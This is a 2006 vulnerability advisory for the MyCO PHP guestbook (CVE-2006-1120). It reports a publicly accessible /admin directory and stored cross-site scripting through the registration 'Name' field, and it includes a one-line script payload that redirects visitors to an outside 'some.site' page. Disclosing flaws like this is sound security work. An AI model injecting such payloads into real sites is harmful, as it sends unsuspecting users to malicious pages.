Bug: MyCO multiple vulnerabilities ( Ascii Version )

	WLB2.ORG
Full List

Bugs

Bogus

Tricks

Exploits

	CVEMAP.ORG
Full List

Vendors

Products

	Tools
CWE Dictionary

Dorks List

cIFrex

	Search
Bugtraq

CVEMAP

CVE Id

CWE Id

	RSS
Full List

Bugs

Exploits

Dorks

	Information
Add note

About



	Submit
To add a note, use this form or send email to submit@cxsec.org


	Social

MyCO multiple vulnerabilities

Published	Credit	Risk
2006.02.01	Revnic Vasile	Low

CWE	CVE	Local	Remote
*N/A*	CVE-2006-1120	Yes	Yes

CVSS Base Score	Impact Subscore		Exploitability Subscore
2.6/10	2.9/10		4.9/10

Exploit range	Attack complexity	Authentication
Remote	High	No required
Confidentiality impact	Integrity impact	Availability impact
None	Partial	None

MyCO multiple vulnerabilities

Software:
MyCO guestbook 1.0
www.punctweb.com

Credit:
Revnic Vasile
revnic (at) gmail (dot) com [email concealed]

Description:
MyCO is a PHP guestbook that uses a MySQL database

Vulnerability:
the /admin directory is accessible by everyone.

XSS can be injected into the field "Name" when registering a new user.
<script>document.location = 'http://some.site/crash_ie.asp';</script>
when viewing members list can redirect user's browser to a malicious site.

ASCII VERSION

Ascii Version

Bug: MyCO multiple vulnerabilities ( Ascii Version )

use this form